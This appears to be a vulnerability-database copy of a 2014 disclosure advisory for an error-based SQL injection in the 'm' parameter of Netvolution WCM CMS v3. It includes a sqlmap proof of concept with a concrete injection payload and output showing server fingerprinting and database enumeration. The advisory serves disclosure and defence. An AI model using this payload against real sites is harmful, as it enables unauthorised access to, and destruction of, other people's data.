Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Netvolution WCM CMS 3 SQL Injection

🗓️ 03 Mar 2014 00:00:00Reported by projectzeroType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 29 Views

Netvolution WCM CMS v3 SQL Injection vulnerabilit

Code
`# Exploit Title: Netvolution WCM - CMS v3 SQL Injection  
# Exploit Type: Error-based SQL injection  
# Date: Sun 02 Mar 2014  
# Exploit Author: projectzero labs  
# Projectzero ID: projectzero2014-002-netvolutionsqli  
# Vendor Homepage: http://www.netvolution.net && http://www.atcom.gr  
# Version: 3 (as vendor comfirmed)  
  
About the Software:  
===================  
  
Netvolution is a very popular commercial CMS developed by Atcom, Greece.  
Many high traffic greek sites use various versions of Netvolution WCM.  
  
Vulnerability Details:  
======================  
  
Projectzero labs identified an "Error-based SQL injection" a the  
parameter m. The attacker can remotely inject sql code and execute  
queries in order to alter, insert or destroy data. That kind of attacks  
can lead to data loss and/or server take over.  
  
Vendor confirmed the vulnerability and advised owners of Netvolution powered  
sites to check the running version of the CMS and update to a  
newer one.  
  
Proof of Concept:  
=================  
sqlmap output:  
  
Place: Get  
Parameter: m  
Type: error-based  
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING  
clause  
Payload: m=siteModules.evenCalendarAjax' AND  
3829=CONVERT(INT,(SELECT CHAR(113)+CHAR(114)... CHAR(115)+CHAR(112)))  
AND 'test'='test&pid=33&lang=2&d=  
  
[HH:MM:SS] [INFO] the back-end DBMS is Microsoft SQL Server  
web server operating system: Windows 2003  
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.5  
back-end DBMS: Microsoft SQL Server 2005  
  
[HH:MM:SS] [INFO] fetching database names  
[HH:MM:SS] [INFO] the SQL query used returns 196 entries  
[HH:MM:SS] [INFO] retrieved: A......  
[HH:MM:SS] [INFO] retrieved: A......  
[HH:MM:SS] [INFO] retrieved: A......  
...  
[HH:MM:SS] [INFO] fetching tables for databases: A...,A....,A... ...  
  
  
Risk:  
=====  
High  
  
Timeline:  
=========  
~Vendor Contact: 18/1/2014 (no reply)  
26/2/2014 (confirmed)  
  
Credits:  
========  
projectzero labs  
[email protected]  
http://projectzero.gr  
_) |  
_ \ _| _ \ | -_) _| _| _ / -_) _| _ \  
__/_| \___/| |\___|\__|\__| ___|\___|_| \___/  
_| [__/  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
03 Mar 2014 00:00Current
cmsnetvolutionsql injectionprojectzero labsatcomgreeceerror-baseddata lossserver take overasp.netiissql server 2005high risk
29